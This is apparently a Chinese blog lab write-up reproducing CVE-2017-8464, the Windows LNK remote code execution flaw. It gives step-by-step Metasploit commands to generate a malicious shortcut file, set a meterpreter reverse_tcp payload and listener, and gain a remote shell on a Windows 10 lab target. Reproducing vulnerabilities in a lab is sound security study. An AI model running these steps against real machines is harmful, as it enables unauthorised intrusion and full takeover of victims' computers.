CVE-2017-8464复现(震网三代)

CVE-2017-8464复现(震网三代)

影响版本
windows 10
windwos RT 8.1
windows 8.1
windows 7
windows server 2016
windows server 2012 R2
windows server 2012
windows server 2008 R2
windows server 2008

1. 漏洞利用与复现

环境:
攻击机kali:192.168.228.128
靶机window10 192.168.228.129
Kali终端输入 msfconsole
在这里插入图片描述
搜索漏洞模块 search cve_2017_8464
在这里插入图片描述

使用攻击模块 use exploit、windows、fileformat/cve_2017_8464_lnk_rce
对应参数的设置:
Set payload windows/meterpreter/reverse_tcp
Set lhost 192.168.228.128 (攻击机的IP)
在这里插入图片描述
检查配置是否设置成功 show options
在这里插入图片描述

Targets:默认就可以了他会自动选择,也可以自己选择对应的系统版本
在这里插入图片描述
开始运行,exploit

在这里插入图片描述

注:生成的文件存放在/root/.msf4/local/下 .msf4是隐藏文件夹
可以先将其拷贝到真机或者U盘中(一会将这个文件放进靶机中)
在这里插入图片描述

我这里把他先剪切到/文件夹下然后拖进了靶机中
回到kali 使用监听模块 use multi/handler
在这里插入图片描述

设置响应的配置:
Set payload windows/meterpreter/reverse_tcp
Set lhost 192.168.228.128
Exploit //开始监听
在这里插入图片描述

下面就用到了刚刚生成的文件,将他在靶机中运行、
这个文件,会反弹一个session到kali中
在这里插入图片描述
注:如果没有弹出meterpreter,可以自己选择session进入,session 1
!](https://img-blog.csdnimg.cn/20210117103309287.png)

输入shell,成功控制目标机
在这里插入图片描述
已经成功监听靶机
在这里插入图片描述

  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值